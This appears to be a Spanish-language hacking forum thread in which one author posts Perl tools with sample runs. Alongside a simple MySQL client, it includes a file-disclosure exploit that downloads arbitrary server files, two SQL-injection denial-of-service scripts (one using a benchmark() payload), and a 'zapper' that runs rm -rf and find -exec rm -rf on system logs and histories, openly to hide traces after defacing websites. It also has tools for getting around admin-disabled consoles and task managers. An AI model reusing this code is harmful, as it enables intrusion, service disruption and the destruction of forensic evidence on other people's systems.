Mensajes

Un simple mysql manager , un triste intento de imitacion al comando mysql pero bueno....

Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#Mysql Manager (C) Doddy Hackman 2011
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd

use DBI;

sub head {
print "\n\n -- == Mysql Manager == --\n\n";
}

sub copyright {
print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 <host> <user> <pass>\n";
}

head();
unless (@ARGV > 2) {
sintax();
} else {
enter($ARGV[0],$ARGV[1],$ARGV[2]);
}
copyright();

sub enter {

print "\n[+] Connecting to the server\n";

$info = "dbi:mysql::".$_[0].":3306";
if (my $enter = DBI->connect($info,$_[1],$_[2],{PrintError=>0})) {

print "\n[+] Enter in the database";

while(1) {
print "\n\n\n[+] Query : ";
chomp(my $ac = <stdin>);

if ($ac eq "exit") {
$enter->disconnect;
print "\n\n[+] Closing connection\n\n";
copyright();
}

$re = $enter->prepare($ac);
$re->execute();
my $total = $re->rows();

my @columnas = @{$re->{NAME}};

if ($total eq "-1") {
print "\n\n[-] Query Error\n";
next;
} else {
print "\n\n[+] Result of the query\n";
if ($total eq 0) {
print "\n\n[+] Not rows returned\n\n";
} else {
print "\n\n[+] Rows returned : ".$total."\n\n\n";
for(@columnas) {
print $_."\t\t";
}
print "\n\n";
while (@row = $re->fetchrow_array) {
for(@row) {
print $_."\t\t";
}
print "\n";
}}}}
} else {
print "\n[-] Error connecting\n";
}}

# ¿ The End ?


Un ejemplo de uso

Código [Seleccionar] Expandir



C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
mysqlman>manager.PL localhost root ""


-- == Mysql Manager == --


[+] Connecting to the server

[+] Enter in the database


[+] Query : show databases


[+] Result of the query


[+] Rows returned : 6


Database

information_schema
cdcol
hackman
mysql
phpmyadmin
test



[+] Query : exit


[+] Closing connection



-- == (C) Doddy Hackman 2011 == --




Un simple exploit que nos ayuda a explotar la vulnerabilidad Full Source Discloure de una forma muy relajante , lo bueno de este programa es que guarda todo lo descargado en una carpeta creada por el programa mismo.
Ademas detecta automaticamente Full Path Discloure para conocer las rutas necesarias para descargar
archivos.

Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#FSD Exploit Manager (C) Doddy Hackman 2011

use LWP::UserAgent;
use URI::Split qw(uri_split);
use File::Basename;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

$SIG{INT} = \&adios;

head();
if($ARGV[0]) {
ver($ARGV[0]);
} else {
sintax();
}
copyright();

sub ver {

my $page = shift;
print "\n[+] Target : ".$page."\n\n";

my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);

if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure Detect\a\n";
$code2 = toma($page."'");
if ($code2=~/No such file or directory in <b>(.*)<\/b> on line/) {
print "\n[+] Full Path Dislocure Detect : ".$1."\n";
}
installer();
while(1) {
print "\n\nurl>";
$SIG{INT} = \&adios;
chomp(my $url = <stdin>);
if (download($page.$url,"fsdlogs/".basename($url))) {
print "\n\n[+] File Downloaded\n";
system("start fsdlogs/".basename($url));
}
}
} else {
print "[-] Web not vulnerable\n\n";
}
}
}

sub adios {
print "\n\n[+] Good Bye\n";
copyright();
}

sub head {
print "\n\n-- == FSD Exploit Manager == --\n\n";
}

sub copyright {
print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 <page>\n";
}

sub toma {
return $nave->get($_[0])->content;
}

sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}

sub installer {
unless (-d "fsdlogs/") {
mkdir("fsdlogs/","777");
}}

# ¿ The End ?


Un ejemplo de uso

Código [Seleccionar] Expandir


C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
FSD Exploit Manager>fsd.pl http://localhost/down.php?down=


-- == FSD Exploit Manager == --


[+] Target : http://localhost/down.php?down=

[+] Full Source Discloure Detect

[+] Full Path Dislocure Detect : C:\xampp\htdocs\down.php


url>c:/aca.txt


[+] File Downloaded


url>c:/aca.txt


[+] File Downloaded


[+] Good Bye


-- == (C) Doddy Hackman 2011 == --




Un simple Dos para SQLi

Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#SQLi Dos 0.1 (C) Doddy Hackman 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]."zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz");
unless($code->is_success) {
print "[+] Web Off";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == SQLI Dos 0.1 == --\n\n";
}

sub copyright {
print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 <page>\n";
}

sub toma {
return $nave->get($_[0]);
}

# ¿ The End ?


Ejemplo de uso

Código [Seleccionar] Expandir


C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
SQLI Dos>sqlidos.pl http://localhost/sql.php?id=1


-- == SQLI Dos 0.1 == --


[+] Target : http://localhost/sql.php?id=1

[+] Starting the attack
[+] Info : control+c for stop attack


[+] Stoping attack


-- == (C) Doddy Hackman 2011 == --



El mismo Dos para SQLi per esta vez usando benchmark()

Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#SQLi Dos 0.2 (C) Doddy Hackman 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == SQLI Dos 0.2 == --\n\n";
}

sub copyright {
print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 <page>\n";
}

sub toma {
return $nave->get($_[0]);
}

# ¿ The End ?

Ejemplo de uso

Código [Seleccionar] Expandir



C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
SQLI Dos>sqlidos.pl http://localhost/sql.php?id=1


-- == SQLI Dos 0.1 == --


[+] Target : http://localhost/sql.php?id=1

[+] Starting the attack
[+] Info : control+c for stop attack

[+] Web Off


-- == (C) Doddy Hackman 2011 == --



Perdon electra , vi mal  .

sorry , hiciste doble post

Ok  , gracias por tu opinion

Bueno ,esta herramienta no tiene un nombre chevere pero bueno , con esta herramienta pueden
borrar sus huellas despues de hacer un masivo deface en una pobre web.
Recuerden que primero deben darle permisos y despues ejecutarlo.

Código [Seleccionar] Expandir


#Zapper
#By Doddy Hackman

@paths = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var
/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth");

@comandos  = ('find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;');

print "[+] Zapping the logs\n";
for (@paths) {
if (-f $_) { system("rm -rf $_"); }
}
for (@comandos) {system($_);}
print "[+] All the logs are erased\n";

#The end


Bueno , BonesX es una herramienta que los ayudara en el momento que quieran usar una consola ms dos y
el admin la haya borrado.
Su uso no es muy dificil asi que creo que podran usarla.
Ademas les ofrece informacion de la maquina actual como : IP , SO , nombre de usuario y grupo del usuario.

Código [Seleccionar] Expandir


#Bones X
#Author = Doddy Hackman
#Very easy console the using if the admin delete the ms-dos original

use Win32::IPConfig;
use Net::Nslookup;
use Color::Output;
Color::Output::Init;

&datos;

sub datos {
system ("title Bones X");
system ("cls");
$ip = nslookup(qtype => "A", domain => "localhost");
system ("prompt Doddy Hackman@$ip.com:");
$so = $^O;
$login = Win32::LoginName();
$domain = Win32::DomainName();

cprint "\x0313
Program: Bones X
Author : Doddy Hackman
\x0x30";

cprint "\x033

Your IP : $ip
SO : $so
Login : $login
Group : $domain

\n\x033";
}

inicio:;
cprint "\x037";
print "C:\\l33t\\";
print "D00d1>";
$cmd=<STDIN>;
chomp $cmd;
cprint "\n\x037";
if ($cmd eq "exit") {
exit 1;
}
elsif ($cmd eq "cls") {&datos;goto inicio}
else {
cprint "\0035";
print "\n";
system ($cmd);
cprint "\n\n\n";
goto inicio ,
}


Bueno ,esta herramienta llamada NightVision , les servira para poder ver sus propios puertos , despues tienen un menu el cual
les permitira cerrar el puerto que les venga en gana.
Esta herramienta puede servir cuando el administrador de un cyber (seguro) bloquea el administrador de tareas.

Código [Seleccionar] Expandir


#Program : NightVision
#Author : Doddy Hackman
#Module neccesary
#ppm install http://trouchelle.com/ppm/Win32-Process-List.ppd

use Win32::Process::List;
use Color::Output;
Color::Output::Init;
use Win32::Process;


&clean;&options;
sub clean {
system 'cls';
system 'title NightVision';
cprint "\x0313";
print "\nNightVision 0.1\nCopyright 2010 Doddy Hackman\nMail:doddy-hackman[at]hotmail[com]\n\n";
cprint "\x0x30\n\n";
my $new = Win32::Process::List->new(); 
my %process = $new->GetProcesses();
chomp %process;
$limit = "";
for my $pid (keys %process) {
if ($pid ne "") {$limit++};
push (@procer,$process{$pid});
push (@pids,$pid);
chomp (@procer,@pids);
}
$limit--;
for my $n(1..$limit) {
cprint "\x037";
print "Process Number: [$n]\tProcess name : $procer[$n]\tPID : $pids[$n]\n";
cprint "\x037";
}}

sub options {
cprint "\0035";
print "\n\nOptions :\n\n[a] : Close a process\n[b] Clean Console\n[c] Exit\n\n\n[+] Write you options : ";
$t = <STDIN>;
chomp $t;
if ($t eq "a") { &close;} elsif ($t eq "b") {&load;&clean;&options;} elsif ($t eq "c") {exit 1;} else {&load;&clean;&options;}}

sub load { system($0); }

sub close {
print "\n[+] Write the number of the process : ";
$numb = <STDIN>;
chomp $numb;
Win32::Process::KillProcess(@pids[$numb],@procer[$numb]);
print "\n\n[+] OK , Process Closed\n\n";&load;&clean;&options;
}